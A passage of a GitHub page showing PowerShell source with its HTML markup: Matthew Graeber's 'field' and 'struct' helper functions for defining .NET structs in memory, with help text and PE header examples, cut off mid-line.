class=\"pl-c\"># A helper function used to reduce typing while defining struct</span></td>\n      </tr>\n      <tr>\n        <td id=\"L475\" class=\"blob-num js-line-number\" data-line-number=\"475\"></td>\n        <td id=\"LC475\" class=\"blob-code blob-code-inner js-file-line\">  <span class=\"pl-c\"># fields.</span></td>\n      </tr>\n      <tr>\n        <td id=\"L476\" class=\"blob-num js-line-number\" data-line-number=\"476\"></td>\n        <td id=\"LC476\" class=\"blob-code blob-code-inner js-file-line\">  <span class=\"pl-k\">function</span> <span class=\"pl-en\">field</span></td>\n      </tr>\n      <tr>\n        <td id=\"L477\" class=\"blob-num js-line-number\" data-line-number=\"477\"></td>\n        <td id=\"LC477\" class=\"blob-code blob-code-inner js-file-line\">  {</td>\n      </tr>\n      <tr>\n        <td id=\"L478\" class=\"blob-num js-line-number\" data-line-number=\"478\"></td>\n        <td id=\"LC478\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">Param</span></td>\n      </tr>\n      <tr>\n        <td id=\"L479\" class=\"blob-num js-line-number\" data-line-number=\"479\"></td>\n        <td id=\"LC479\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">(</span></td>\n      </tr>\n      <tr>\n        <td id=\"L480\" class=\"blob-num js-line-number\" data-line-number=\"480\"></td>\n        <td id=\"LC480\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-ent\">[Paramete<span class=\"pl-ent\">r</span></span><span class=\"pl-e\">(<span class=\"pl-e\"><span class=\"pl-e\"><span class=\"pl-c1\">Position</span> =<span class=\"pl-smi\"> 0</span></span></span>, <span class=\"pl-e\"><span class=\"pl-e\"><span class=\"pl-c1\">Mandatory</span> =<span class=\"pl-smi\"> $True</span></span></span>)</span><span class=\"pl-ent\">]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L481\" class=\"blob-num js-line-number\" data-line-number=\"481\"></td>\n        <td id=\"LC481\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-e\">[UInt</span>16<span class=\"pl-e\">]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L482\" class=\"blob-num js-line-number\" data-line-number=\"482\"></td>\n        <td id=\"LC482\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-k\">$</span><span class=\"pl-smi\">Position</span><span class=\"pl-k\">,</span></td>\n      </tr>\n      <tr>\n        <td id=\"L483\" class=\"blob-num js-line-number\" data-line-number=\"483\"></td>\n        <td id=\"LC483\" class=\"blob-code blob-code-inner js-file-line\">        </td>\n      </tr>\n      <tr>\n        <td id=\"L484\" class=\"blob-num js-line-number\" data-line-number=\"484\"></td>\n        <td id=\"LC484\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-ent\">[Paramete<span class=\"pl-ent\">r</span></span><span class=\"pl-e\">(<span class=\"pl-e\"><span class=\"pl-e\"><span class=\"pl-c1\">Position</span> =<span class=\"pl-smi\"> 1</span></span></span>, <span class=\"pl-e\"><span class=\"pl-e\"><span class=\"pl-c1\">Mandatory</span> =<span class=\"pl-smi\"> $True</span></span></span>)</span><span class=\"pl-ent\">]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L485\" class=\"blob-num js-line-number\" data-line-number=\"485\"></td>\n        <td id=\"LC485\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-e\">[Type]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L486\" class=\"blob-num js-line-number\" data-line-number=\"486\"></td>\n        <td id=\"LC486\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-k\">$</span><span class=\"pl-smi\">Type</span><span class=\"pl-k\">,</span></td>\n      </tr>\n      <tr>\n        <td id=\"L487\" class=\"blob-num js-line-number\" data-line-number=\"487\"></td>\n        <td id=\"LC487\" class=\"blob-code blob-code-inner js-file-line\">        </td>\n      </tr>\n      <tr>\n        <td id=\"L488\" class=\"blob-num js-line-number\" data-line-number=\"488\"></td>\n        <td id=\"LC488\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-ent\">[Paramete<span class=\"pl-ent\">r</span></span><span class=\"pl-e\">(<span class=\"pl-e\"><span class=\"pl-e\"><span class=\"pl-c1\">Position</span> =<span class=\"pl-smi\"> 2</span></span></span>)</span><span class=\"pl-ent\">]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L489\" class=\"blob-num js-line-number\" data-line-number=\"489\"></td>\n        <td id=\"LC489\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-e\">[UInt</span>16<span class=\"pl-e\">]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L490\" class=\"blob-num js-line-number\" data-line-number=\"490\"></td>\n        <td id=\"LC490\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-k\">$</span><span class=\"pl-smi\">Offset</span><span class=\"pl-k\">,</span></td>\n      </tr>\n      <tr>\n        <td id=\"L491\" class=\"blob-num js-line-number\" data-line-number=\"491\"></td>\n        <td id=\"LC491\" class=\"blob-code blob-code-inner js-file-line\">        </td>\n      </tr>\n      <tr>\n        <td id=\"L492\" class=\"blob-num js-line-number\" data-line-number=\"492\"></td>\n        <td id=\"LC492\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-e\">[Object[]]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L493\" class=\"blob-num js-line-number\" data-line-number=\"493\"></td>\n        <td id=\"LC493\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-k\">$</span><span class=\"pl-smi\">MarshalAs</span></td>\n      </tr>\n      <tr>\n        <td id=\"L494\" class=\"blob-num js-line-number\" data-line-number=\"494\"></td>\n        <td id=\"LC494\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L495\" class=\"blob-num js-line-number\" data-line-number=\"495\"></td>\n        <td id=\"LC495\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L496\" class=\"blob-num js-line-number\" data-line-number=\"496\"></td>\n        <td id=\"LC496\" class=\"blob-code blob-code-inner js-file-line\">        @{</td>\n      </tr>\n      <tr>\n        <td id=\"L497\" class=\"blob-num js-line-number\" data-line-number=\"497\"></td>\n        <td id=\"LC497\" class=\"blob-code blob-code-inner js-file-line\">            Position <span class=\"pl-k\">=</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">Position</span></td>\n      </tr>\n      <tr>\n        <td id=\"L498\" class=\"blob-num js-line-number\" data-line-number=\"498\"></td>\n        <td id=\"LC498\" class=\"blob-code blob-code-inner js-file-line\">            Type <span class=\"pl-k\">=</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">Type</span> <span class=\"pl-k\">-as</span> <span class=\"pl-e\">[Type]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L499\" class=\"blob-num js-line-number\" data-line-number=\"499\"></td>\n        <td id=\"LC499\" class=\"blob-code blob-code-inner js-file-line\">            Offset <span class=\"pl-k\">=</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">Offset</span></td>\n      </tr>\n      <tr>\n        <td id=\"L500\" class=\"blob-num js-line-number\" data-line-number=\"500\"></td>\n        <td id=\"LC500\" class=\"blob-code blob-code-inner js-file-line\">            MarshalAs <span class=\"pl-k\">=</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">MarshalAs</span></td>\n      </tr>\n      <tr>\n        <td id=\"L501\" class=\"blob-num js-line-number\" data-line-number=\"501\"></td>\n        <td id=\"LC501\" class=\"blob-code blob-code-inner js-file-line\">        }</td>\n      </tr>\n      <tr>\n        <td id=\"L502\" class=\"blob-num js-line-number\" data-line-number=\"502\"></td>\n        <td id=\"LC502\" class=\"blob-code blob-code-inner js-file-line\">    }</td>\n      </tr>\n      <tr>\n        <td id=\"L503\" class=\"blob-num js-line-number\" data-line-number=\"503\"></td>\n        <td id=\"LC503\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L504\" class=\"blob-num js-line-number\" data-line-number=\"504\"></td>\n        <td id=\"LC504\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L505\" class=\"blob-num js-line-number\" data-line-number=\"505\"></td>\n        <td id=\"LC505\" class=\"blob-code blob-code-inner js-file-line\">  <span class=\"pl-k\">function</span> <span class=\"pl-en\">struct</span></td>\n      </tr>\n      <tr>\n        <td id=\"L506\" class=\"blob-num js-line-number\" data-line-number=\"506\"></td>\n        <td id=\"LC506\" class=\"blob-code blob-code-inner js-file-line\">  {</td>\n      </tr>\n      <tr>\n        <td id=\"L507\" class=\"blob-num js-line-number\" data-line-number=\"507\"></td>\n        <td id=\"LC507\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-c\">&lt;#</span></td>\n      </tr>\n      <tr>\n        <td id=\"L508\" class=\"blob-num js-line-number\" data-line-number=\"508\"></td>\n        <td id=\"LC508\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"><span class=\"pl-c\">        <span class=\"pl-c1\">.</span><span class=\"pl-k\">SYNOPSIS</span></span></span></td>\n      </tr>\n      <tr>\n        <td id=\"L509\" class=\"blob-num js-line-number\" data-line-number=\"509\"></td>\n        <td id=\"LC509\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L510\" class=\"blob-num js-line-number\" data-line-number=\"510\"></td>\n        <td id=\"LC510\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">        Creates an in-memory struct for use in your PowerShell session.</span></td>\n      </tr>\n      <tr>\n        <td id=\"L511\" class=\"blob-num js-line-number\" data-line-number=\"511\"></td>\n        <td id=\"LC511\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L512\" class=\"blob-num js-line-number\" data-line-number=\"512\"></td>\n        <td id=\"LC512\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">        Author: Matthew Graeber (@mattifestation)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L513\" class=\"blob-num js-line-number\" data-line-number=\"513\"></td>\n        <td id=\"LC513\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">        License: BSD 3-Clause</span></td>\n      </tr>\n      <tr>\n        <td id=\"L514\" class=\"blob-num js-line-number\" data-line-number=\"514\"></td>\n        <td id=\"LC514\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">        Required Dependencies: None</span></td>\n      </tr>\n      <tr>\n        <td id=\"L515\" class=\"blob-num js-line-number\" data-line-number=\"515\"></td>\n        <td id=\"LC515\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">        Optional Dependencies: field</span></td>\n      </tr>\n      <tr>\n        <td id=\"L516\" class=\"blob-num js-line-number\" data-line-number=\"516\"></td>\n        <td id=\"LC516\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"> </span></td>\n      </tr>\n      <tr>\n        <td id=\"L517\" class=\"blob-num js-line-number\" data-line-number=\"517\"></td>\n        <td id=\"LC517\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"><span class=\"pl-c\">        <span class=\"pl-c1\">.</span><span class=\"pl-k\">DESCRIPTION</span></span></span></td>\n      </tr>\n      <tr>\n        <td id=\"L518\" class=\"blob-num js-line-number\" data-line-number=\"518\"></td>\n        <td id=\"LC518\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L519\" class=\"blob-num js-line-number\" data-line-number=\"519\"></td>\n        <td id=\"LC519\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">        The &#39;struct&#39; function facilitates the creation of structs entirely in</span></td>\n      </tr>\n      <tr>\n        <td id=\"L520\" class=\"blob-num js-line-number\" data-line-number=\"520\"></td>\n        <td id=\"LC520\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">        memory using as close to a &quot;C style&quot; as PowerShell will allow. Struct</span></td>\n      </tr>\n      <tr>\n        <td id=\"L521\" class=\"blob-num js-line-number\" data-line-number=\"521\"></td>\n        <td id=\"LC521\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">        fields are specified using a hashtable where each field of the struct</span></td>\n      </tr>\n      <tr>\n        <td id=\"L522\" class=\"blob-num js-line-number\" data-line-number=\"522\"></td>\n        <td id=\"LC522\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">        is comprosed of the order in which it should be defined, its .NET</span></td>\n      </tr>\n      <tr>\n        <td id=\"L523\" class=\"blob-num js-line-number\" data-line-number=\"523\"></td>\n        <td id=\"LC523\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">        type, and optionally, its offset and special marshaling attributes.</span></td>\n      </tr>\n      <tr>\n        <td id=\"L524\" class=\"blob-num js-line-number\" data-line-number=\"524\"></td>\n        <td id=\"LC524\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L525\" class=\"blob-num js-line-number\" data-line-number=\"525\"></td>\n        <td id=\"LC525\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">        One of the features of &#39;struct&#39; is that after your struct is defined,</span></td>\n      </tr>\n      <tr>\n        <td id=\"L526\" class=\"blob-num js-line-number\" data-line-number=\"526\"></td>\n        <td id=\"LC526\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">        it will come with a built-in GetSize method as well as an explicit</span></td>\n      </tr>\n      <tr>\n        <td id=\"L527\" class=\"blob-num js-line-number\" data-line-number=\"527\"></td>\n        <td id=\"LC527\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">        converter so that you can easily cast an IntPtr to the struct without</span></td>\n      </tr>\n      <tr>\n        <td id=\"L528\" class=\"blob-num js-line-number\" data-line-number=\"528\"></td>\n        <td id=\"LC528\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">        relying upon calling SizeOf and/or PtrToStructure in the Marshal</span></td>\n      </tr>\n      <tr>\n        <td id=\"L529\" class=\"blob-num js-line-number\" data-line-number=\"529\"></td>\n        <td id=\"LC529\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">        class.</span></td>\n      </tr>\n      <tr>\n        <td id=\"L530\" class=\"blob-num js-line-number\" data-line-number=\"530\"></td>\n        <td id=\"LC530\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L531\" class=\"blob-num js-line-number\" data-line-number=\"531\"></td>\n        <td id=\"LC531\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"><span class=\"pl-c\">        <span class=\"pl-c1\">.</span><span class=\"pl-k\">PARAMETER</span> <span class=\"pl-k\">Module</span></span></span></td>\n      </tr>\n      <tr>\n        <td id=\"L532\" class=\"blob-num js-line-number\" data-line-number=\"532\"></td>\n        <td id=\"LC532\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L533\" class=\"blob-num js-line-number\" data-line-number=\"533\"></td>\n        <td id=\"LC533\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">        The in-memory module that will host the struct. Use</span></td>\n      </tr>\n      <tr>\n        <td id=\"L534\" class=\"blob-num js-line-number\" data-line-number=\"534\"></td>\n        <td id=\"LC534\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">        New-InMemoryModule to define an in-memory module.</span></td>\n      </tr>\n      <tr>\n        <td id=\"L535\" class=\"blob-num js-line-number\" data-line-number=\"535\"></td>\n        <td id=\"LC535\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L536\" class=\"blob-num js-line-number\" data-line-number=\"536\"></td>\n        <td id=\"LC536\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"><span class=\"pl-c\">        <span class=\"pl-c1\">.</span><span class=\"pl-k\">PARAMETER</span> <span class=\"pl-k\">FullName</span></span></span></td>\n      </tr>\n      <tr>\n        <td id=\"L537\" class=\"blob-num js-line-number\" data-line-number=\"537\"></td>\n        <td id=\"LC537\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L538\" class=\"blob-num js-line-number\" data-line-number=\"538\"></td>\n        <td id=\"LC538\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">        The fully-qualified name of the struct.</span></td>\n      </tr>\n      <tr>\n        <td id=\"L539\" class=\"blob-num js-line-number\" data-line-number=\"539\"></td>\n        <td id=\"LC539\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L540\" class=\"blob-num js-line-number\" data-line-number=\"540\"></td>\n        <td id=\"LC540\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"><span class=\"pl-c\">        <span class=\"pl-c1\">.</span><span class=\"pl-k\">PARAMETER</span> <span class=\"pl-k\">StructFields</span></span></span></td>\n      </tr>\n      <tr>\n        <td id=\"L541\" class=\"blob-num js-line-number\" data-line-number=\"541\"></td>\n        <td id=\"LC541\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L542\" class=\"blob-num js-line-number\" data-line-number=\"542\"></td>\n        <td id=\"LC542\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">        A hashtable of fields. Use the &#39;field&#39; helper function to ease</span></td>\n      </tr>\n      <tr>\n        <td id=\"L543\" class=\"blob-num js-line-number\" data-line-number=\"543\"></td>\n        <td id=\"LC543\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">        defining each field.</span></td>\n      </tr>\n      <tr>\n        <td id=\"L544\" class=\"blob-num js-line-number\" data-line-number=\"544\"></td>\n        <td id=\"LC544\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L545\" class=\"blob-num js-line-number\" data-line-number=\"545\"></td>\n        <td id=\"LC545\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"><span class=\"pl-c\">        <span class=\"pl-c1\">.</span><span class=\"pl-k\">PARAMETER</span> <span class=\"pl-k\">PackingSize</span></span></span></td>\n      </tr>\n      <tr>\n        <td id=\"L546\" class=\"blob-num js-line-number\" data-line-number=\"546\"></td>\n        <td id=\"LC546\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L547\" class=\"blob-num js-line-number\" data-line-number=\"547\"></td>\n        <td id=\"LC547\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">        Specifies the memory alignment of fields.</span></td>\n      </tr>\n      <tr>\n        <td id=\"L548\" class=\"blob-num js-line-number\" data-line-number=\"548\"></td>\n        <td id=\"LC548\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L549\" class=\"blob-num js-line-number\" data-line-number=\"549\"></td>\n        <td id=\"LC549\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"><span class=\"pl-c\">        <span class=\"pl-c1\">.</span><span class=\"pl-k\">PARAMETER</span> <span class=\"pl-k\">ExplicitLayout</span></span></span></td>\n      </tr>\n      <tr>\n        <td id=\"L550\" class=\"blob-num js-line-number\" data-line-number=\"550\"></td>\n        <td id=\"LC550\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L551\" class=\"blob-num js-line-number\" data-line-number=\"551\"></td>\n        <td id=\"LC551\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">        Indicates that an explicit offset for each field will be specified.</span></td>\n      </tr>\n      <tr>\n        <td id=\"L552\" class=\"blob-num js-line-number\" data-line-number=\"552\"></td>\n        <td id=\"LC552\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L553\" class=\"blob-num js-line-number\" data-line-number=\"553\"></td>\n        <td id=\"LC553\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"><span class=\"pl-c\">        <span class=\"pl-c1\">.</span><span class=\"pl-k\">EXAMPLE</span></span></span></td>\n      </tr>\n      <tr>\n        <td id=\"L554\" class=\"blob-num js-line-number\" data-line-number=\"554\"></td>\n        <td id=\"LC554\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L555\" class=\"blob-num js-line-number\" data-line-number=\"555\"></td>\n        <td id=\"LC555\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">        $Mod = New-InMemoryModule -ModuleName Win32</span></td>\n      </tr>\n      <tr>\n        <td id=\"L556\" class=\"blob-num js-line-number\" data-line-number=\"556\"></td>\n        <td id=\"LC556\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L557\" class=\"blob-num js-line-number\" data-line-number=\"557\"></td>\n        <td id=\"LC557\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">        $ImageDosSignature = psenum $Mod PE.IMAGE_DOS_SIGNATURE UInt16 @{</span></td>\n      </tr>\n      <tr>\n        <td id=\"L558\" class=\"blob-num js-line-number\" data-line-number=\"558\"></td>\n        <td id=\"LC558\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">            DOS_SIGNATURE =    0x5A4D</span></td>\n      </tr>\n      <tr>\n        <td id=\"L559\" class=\"blob-num js-line-number\" data-line-number=\"559\"></td>\n        <td id=\"LC559\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">            OS2_SIGNATURE =    0x454E</span></td>\n      </tr>\n      <tr>\n        <td id=\"L560\" class=\"blob-num js-line-number\" data-line-number=\"560\"></td>\n        <td id=\"LC560\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">            OS2_SIGNATURE_LE = 0x454C</span></td>\n      </tr>\n      <tr>\n        <td id=\"L561\" class=\"blob-num js-line-number\" data-line-number=\"561\"></td>\n        <td id=\"LC561\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">            VXD_SIGNATURE =    0x454C</span></td>\n      </tr>\n      <tr>\n        <td id=\"L562\" class=\"blob-num js-line-number\" data-line-number=\"562\"></td>\n        <td id=\"LC562\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">        }</span></td>\n      </tr>\n      <tr>\n        <td id=\"L563\" class=\"blob-num js-line-number\" data-line-number=\"563\"></td>\n        <td id=\"LC563\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L564\" class=\"blob-num js-line-number\" data-line-number=\"564\"></td>\n        <td id=\"LC564\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">        $ImageDosHeader = struct $Mod PE.IMAGE_DOS_HEADER @{</span></td>\n      </tr>\n      <tr>\n        <td id=\"L565\" class=\"blob-num js-line-number\" data-line-number=\"565\"></td>\n        <td id=\"LC565\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">            e_magic =    field 0 $ImageDosSignature</span></td>\n      </tr>\n      <tr>\n        <td id=\"L566\" class=\"blob-num js-line-number\" data-line-number=\"566\"></td>\n        <td id=\"LC566\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">            e_cblp =     field 1 UInt16</span></td>\n      </tr>\n      <tr>\n        <td id=\"L567\" class=\"blob-num js-line-number\" data-line-number=\"567\"></td>\n        <td id=\"LC567\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">            e_cp =       field 2 UInt16</span></td>\n      </tr>\n      <tr>\n        <td id=\"L568\" class=\"blob-num js-line-number\" data-line-number=\"568\"></td>\n        <td id=\"LC568\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">            e_crlc =     field 3 UInt16</span></td>\n      </tr>\n      <tr>\n        <td id=\"L569\" class=\"blob-num js-line-number\" data-line-number=\"569\"></td>\n        <td id=\"LC569\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">            e_cparhdr =  field 4 UInt16</span></td>\n      </tr>\n      <tr>\n        <td id=\"L570\" class=\"blob-num js-line-number\" data-line-number=\"570\"></td>\n        <td id=\"LC570\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">            e_minalloc = field 5 UInt16</span></td>\n      </tr>\n      <tr>\n        <td id=\"L571\" class=\"blob-num js-line-number\" data-line-number=\"571\"></td>\n        <td id=\"LC571\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">            e_maxalloc = field 6 UInt16</span></td>\n      </tr>\n      <tr>\n        <td id=\"L572\" class=\"blob-num js-line-number\" data-line-number=\"572\"></td>\n        <td id=\"LC572\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">            e_ss =       field 7 UInt16</span></td>\n      </tr>\n      <tr>\n        <td id=\"L573\" class=\"blob-num js-line-number\" data-line-number=\"573\"></td>\n        <td id=\"LC573\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">            e_sp =       field 8 UInt16</span></td>\n      </tr>\n      <tr>\n        <td id=\"L574\" class=\"blob-num js-line-number\" data-line-number=\"574\"></td>\n        <td id=\"LC574\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">            e_csum =     field 9 UInt16</span></td>\n      </tr>\n      <tr>\n        <td id=\"L575\" class=\"blob-num js-line-number\" data-line-number=\"575\"></td>\n        <td id=\"LC575\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">            e_ip =       field 10 UInt16</span></td>\n      </tr>\n      <tr>\n        <td id=\"L576\" class=\"blob-num js-line-number\" data-line-number=\"576\"></td>\n        <td id=\"LC576\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">            e_cs =       field 11 UInt16</span></td>\n      </tr>\n      <tr>\n        <td id=\"L577\" class=\"blob-num js-line-number\" data-line-number=\"577\"></td>\n        <td id=\"LC577\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">            e_lfarlc =   field 12 UInt16</span></td>\n      </tr>\n      <tr>\n        <td id=\"L578\" class=\"blob-num js-line-number\" data-line-number=\"578\"></td>\n        <td id=\"LC578\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">            e_ovno =     field 13 UInt16</span></td>\n      </tr>\n      <tr>\n        <td id=\"L579\" class=\"blob-num js-line-number\" data-line-number=\"579\"></td>\n        <td id=\"LC579\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">            e_res =      field 14 UInt16[] -MarshalAs @(&#39;ByValArray&#39;, 4)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L580\" class=\"blob-num js-line-number\" data-line-number=\"580\"></td>\n        <td id=\"LC580\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">            e_oemid =    field 15 UInt16</span></td>\n      </tr>\n      <tr>\n        <td id=\"L581\" class=\"blob-num js-line-number\" data-line-number=\"581\"></td>\n        <td id=\"LC581\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">            e_oeminfo =  field 16 UInt16</span></td>\n      </tr>\n      <tr>\n        <td id=\"L582\" class=\"blob-num js-line-number\" data-line-number=\"582\"></td>\n        <td id=\"LC582\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">            e_res2 =     field 17 UInt16[] -MarshalAs @(&#39;ByValArray&#39;, 10)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L583\" class=\"blob-num js-line-number\" data-line-number=\"583\"></td>\n        <td id=\"LC583\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">            e_lfanew =   field 18 Int32</span></td>\n      </tr>\n      <tr>\n        <td id=\"L584\" class=\"blob-num js-line-number\" data-line-number=\"584\"></td>\n        <td id=\"LC584\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">        }</span></td>\n      </tr>\n      <tr>\n        <td id=\"L585\" class=\"blob-num js-line-number\" data-line-number=\"585\"></td>\n        <td id=\"LC585\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L586\" class=\"blob-num js-line-number\" data-line-number=\"586\"></td>\n        <td id=\"LC586\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">        # Example of using an explicit layout in order to create a union.</span></td>\n      </tr>\n      <tr>\n        <td id=\"L587\" class=\"blob-num js-line-number\" data-line-number=\"587\"></td>\n        <td id=\"LC587\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">        $TestUnion = struct $Mod TestUnion @{</span></td>\n      </tr>\n      <tr>\n        <td id=\"L588\" class=\"blob-num js-line-number\" data-line-number=\"588\"></td>\n        <td id=\"LC588\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">            field1 = field 0 UInt32 0</span></td>\n      </tr>\n      <tr>\n        <td id=\"L589\" class=\"blob-num js-line-number\" data-line-number=\"589\"></td>\n        <td id=\"LC589\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">            field2 = field 1 IntPtr 0</span></td>\n      </tr>\n      <tr>\n        <td id=\"L590\" class=\"blob-num js-line-number\" data-line-number=\"590\"></td>\n        <td id=\"LC590\" class=\"blob-code blob-code-inner 